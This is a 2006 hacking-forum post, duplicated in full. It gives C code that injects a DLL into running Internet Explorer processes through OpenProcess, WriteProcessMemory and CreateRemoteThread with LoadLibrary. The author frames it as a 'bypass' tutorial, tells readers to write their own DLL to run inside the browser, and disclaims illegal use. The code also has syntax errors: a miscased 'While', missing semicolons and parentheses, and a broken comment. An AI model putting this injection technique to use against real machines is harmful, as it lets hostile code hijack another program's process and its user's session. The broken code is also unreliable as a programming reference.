synack
10-21-2006, 07:47 AM
================================================== ===============
To Whom it may concern,
back off before I stick a lightsaber up your ass and turn it on.
================================================== ===============
Don't come crying to me if you do anything illegal with
this code.
Thanks to haking9.labs in Poland for the original concept.
Check issue 4/2005 of haking9 magazine for the original code.
I have just cleaned up the code some.
To get this to work you need to complete the following
1 - find a target process. Use CreateToolHelp32Snapshot. Use Process32First() and
Process32Next() to look through the process snapshot, kinda like traversing a
LinkedList.
2 - attach a thread.
3 - communicate with remote app using the thread.
4 - write a dll to be called from within the remote app
issue 4/2005 of haking9 magazine has a sample function.
Structured Programming tips;
----------------------------
Sequence
Selection
Repetition
Recycle your code. Write a function once and re-use it
on other projects. Start building your own lib
There are some function calls in this code, you
need to read through the header files and understand the
winblows api to appreciate what they all do. Read up
on prototypes as well. Next post on thebroken.phorum
will be writing bots and spiders in java.
synack
Programming a bypass 101 - attaching threads to a host application
=================================================
/* beginning of code segment */
/*
* oilz.c
*
* I have choosen to use iexplorer.exe as the
* default.
* Any questions' or constructive criticism, pm me
* on the forum.
*
* One of the first tasks you need to complete
* is to make sure you have these header files
* on the system you compile the code on, or
* you will get all sorts of phunkey output from
*/ the pre-compiler.
/*
* header files that the program requires
* check the following URLs' for more information
* http://www.hakin9.org/es/index.php?page=poleca
* http://www.koders.com/c/fidB7C2788ACDE2858F32DA237A95FD33D5048877DA.aspx
* http://www.winapi.org/
*/
#include <windows.h> /* Header file for windows */
#include <tlhelp32.h> /* tool help32 header file */
#include <stdio.h> /* Standard input/output header */
BOOL AttachThread(); /* Function prototype. A function prototype */
BOOL FindInternetExplorer(); /* defines what type the function is */
/* expected to return */
/* globals, not good practice but I do not care atm */
/* exams = no_pipe */
HANDLE hProcessSnap; /* List of running processes*/
HANDLE hProcess; /* target process */
PROCESSENTRY32 pe32; /* process entry list */
TCHAR ModuleFileName[MAX_PATH];
LPTSTR FileName;
DWORD dwPriorityClass;
LPVOID RemoteFileName;
HANDLE hRemoteThread;
HINSTANCE RemoteModule;
/*
* main function. need I type more?
*
*/
int
main(int argc, char *argv[]){
FindInternetExplorer();
exit 0; /* cleanly exit the program */
}
BOOL
UnloadThread(){
WaitForSingleObject(hRemoteThread, INFINITE);
GetExitCodeThread( hRemoteThread, (LPDWORD)&RemoteModule);
hRemoteThread = CreateRemoteThread( hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle( TEXT("kernel32.dll") ),
"FreeLibrary"), RemoteModule, 0, NULL);
/* do some housework */
VirtualFreeEx( hProcess, RemoteFileName, 0, MEM_RELEASE);
CloseHandle( hRemoteThread);
return(TRUE);
}
BOOL
InitiateThread(){
hRemoteThread = CreateRemoteThread( hProcess, NULL, 0,
LPTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle( TEXT("kernel32.dll") ),
#ifdef UNICODE
"LoadLibraryW"),
#else
"LoadLibraryA"),
#endif
RemoteFileName, 0, NULL);
return(TRUE);
}
BOOL
SetPath(){
ModuleFileName[0] = TEXT('\0');
GetModuleFileName( NULL, ModuleFileName, MAX_PATH);
FileName = &ModuleFileName[lstrlen(ModuleFileName)];
While( FileName > &ModuleFileName[0] && FileName[0] != TEXT('\\')
&& FileName[0] != TEXT('\')){
FileName--
if(FileName[0] != TEXT('\0') ){
FileName++
}
}
return(TRUE);
}
BOOL
AttachThread( HANDLE hProcess){
/* define locals' */
/* We need a page of memory for our thread */
RemoteFileName = VirtualAllocEx( hProcess, NULL, MAX_PATH, MEM_COMMIT,
PAGE_READWRITE);
if(RemoteFileName){
SetPath();
}
if(WriteProcessMemory( hProcess, RemoteFileName, ModuleFileName,
MAX_PATH, NULL)){
InitiateThread();
}
UnloadThread();
/* there is only one RETURN and that's JEDI */
return(TRUE);
}
BOOL
FindInternetExplorer(){
/* Function call to retrieve process snapshot*/
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
/* Condition testing for errors */
if( hProcessSnap == INVALID_HANDLE_VALUE){
/* Return a false boolean value, ie our function failed*/
return(FALSE);
}
/* DwordUp */
pe32.dwSize = sizeof(ProcessEntry32);
/* more condition testing */
if( !Process32First( hProcessSnap, &pe32)){
/* dump the snapshot and cut loose from the function */
CloseHandle(hProcessSnap);
return(false);
}
/* Down to business*/
do{
/* condition test to compare strings
* This is to ensure we have found iexplore.exe
*/
if(strcmp(pe32.szExeFile, "iexplore.exe") == 0){
/* opensesame */
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe32.th32Proc essID);
/* forever testing conditions */
if( hProcess != NULL){
/* time to attach a thread */
AttachThread( hProcess);
}
/* Start to close and clean the connection */
CloseHandle(hProcess);
}
}while( Process32Next(hProcessSnap, &pe32));
/* Housekeeping */
CloseHandle( hProcessSnap);
/* SUCCESS! */
return(TRUE);
}
/* end of code segment */
To Whom it may concern,
back off before I stick a lightsaber up your ass and turn it on.
================================================== ===============
Don't come crying to me if you do anything illegal with
this code.
Thanks to haking9.labs in Poland for the original concept.
Check issue 4/2005 of haking9 magazine for the original code.
I have just cleaned up the code some.
To get this to work you need to complete the following
1 - find a target process. Use CreateToolHelp32Snapshot. Use Process32First() and
Process32Next() to look through the process snapshot, kinda like traversing a
LinkedList.
2 - attach a thread.
3 - communicate with remote app using the thread.
4 - write a dll to be called from within the remote app
issue 4/2005 of haking9 magazine has a sample function.
Structured Programming tips;
----------------------------
Sequence
Selection
Repetition
Recycle your code. Write a function once and re-use it
on other projects. Start building your own lib
There are some function calls in this code, you
need to read through the header files and understand the
winblows api to appreciate what they all do. Read up
on prototypes as well. Next post on thebroken.phorum
will be writing bots and spiders in java.
synack
Programming a bypass 101 - attaching threads to a host application
=================================================
/* beginning of code segment */
/*
* oilz.c
*
* I have choosen to use iexplorer.exe as the
* default.
* Any questions' or constructive criticism, pm me
* on the forum.
*
* One of the first tasks you need to complete
* is to make sure you have these header files
* on the system you compile the code on, or
* you will get all sorts of phunkey output from
*/ the pre-compiler.
/*
* header files that the program requires
* check the following URLs' for more information
* http://www.hakin9.org/es/index.php?page=poleca
* http://www.koders.com/c/fidB7C2788ACDE2858F32DA237A95FD33D5048877DA.aspx
* http://www.winapi.org/
*/
#include <windows.h> /* Header file for windows */
#include <tlhelp32.h> /* tool help32 header file */
#include <stdio.h> /* Standard input/output header */
BOOL AttachThread(); /* Function prototype. A function prototype */
BOOL FindInternetExplorer(); /* defines what type the function is */
/* expected to return */
/* globals, not good practice but I do not care atm */
/* exams = no_pipe */
HANDLE hProcessSnap; /* List of running processes*/
HANDLE hProcess; /* target process */
PROCESSENTRY32 pe32; /* process entry list */
TCHAR ModuleFileName[MAX_PATH];
LPTSTR FileName;
DWORD dwPriorityClass;
LPVOID RemoteFileName;
HANDLE hRemoteThread;
HINSTANCE RemoteModule;
/*
* main function. need I type more?
*
*/
int
main(int argc, char *argv[]){
FindInternetExplorer();
exit 0; /* cleanly exit the program */
}
BOOL
UnloadThread(){
WaitForSingleObject(hRemoteThread, INFINITE);
GetExitCodeThread( hRemoteThread, (LPDWORD)&RemoteModule);
hRemoteThread = CreateRemoteThread( hProcess, NULL, 0,
(LPTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle( TEXT("kernel32.dll") ),
"FreeLibrary"), RemoteModule, 0, NULL);
/* do some housework */
VirtualFreeEx( hProcess, RemoteFileName, 0, MEM_RELEASE);
CloseHandle( hRemoteThread);
return(TRUE);
}
BOOL
InitiateThread(){
hRemoteThread = CreateRemoteThread( hProcess, NULL, 0,
LPTHREAD_START_ROUTINE)GetProcAddress(
GetModuleHandle( TEXT("kernel32.dll") ),
#ifdef UNICODE
"LoadLibraryW"),
#else
"LoadLibraryA"),
#endif
RemoteFileName, 0, NULL);
return(TRUE);
}
BOOL
SetPath(){
ModuleFileName[0] = TEXT('\0');
GetModuleFileName( NULL, ModuleFileName, MAX_PATH);
FileName = &ModuleFileName[lstrlen(ModuleFileName)];
While( FileName > &ModuleFileName[0] && FileName[0] != TEXT('\\')
&& FileName[0] != TEXT('\')){
FileName--
if(FileName[0] != TEXT('\0') ){
FileName++
}
}
return(TRUE);
}
BOOL
AttachThread( HANDLE hProcess){
/* define locals' */
/* We need a page of memory for our thread */
RemoteFileName = VirtualAllocEx( hProcess, NULL, MAX_PATH, MEM_COMMIT,
PAGE_READWRITE);
if(RemoteFileName){
SetPath();
}
if(WriteProcessMemory( hProcess, RemoteFileName, ModuleFileName,
MAX_PATH, NULL)){
InitiateThread();
}
UnloadThread();
/* there is only one RETURN and that's JEDI */
return(TRUE);
}
BOOL
FindInternetExplorer(){
/* Function call to retrieve process snapshot*/
hProcessSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
/* Condition testing for errors */
if( hProcessSnap == INVALID_HANDLE_VALUE){
/* Return a false boolean value, ie our function failed*/
return(FALSE);
}
/* DwordUp */
pe32.dwSize = sizeof(ProcessEntry32);
/* more condition testing */
if( !Process32First( hProcessSnap, &pe32)){
/* dump the snapshot and cut loose from the function */
CloseHandle(hProcessSnap);
return(false);
}
/* Down to business*/
do{
/* condition test to compare strings
* This is to ensure we have found iexplore.exe
*/
if(strcmp(pe32.szExeFile, "iexplore.exe") == 0){
/* opensesame */
hProcess = OpenProcess(PROCESS_ALL_ACCESS,FALSE,pe32.th32Proc essID);
/* forever testing conditions */
if( hProcess != NULL){
/* time to attach a thread */
AttachThread( hProcess);
}
/* Start to close and clean the connection */
CloseHandle(hProcess);
}
}while( Process32Next(hProcessSnap, &pe32));
/* Housekeeping */
CloseHandle( hProcessSnap);
/* SUCCESS! */
return(TRUE);
}
/* end of code segment */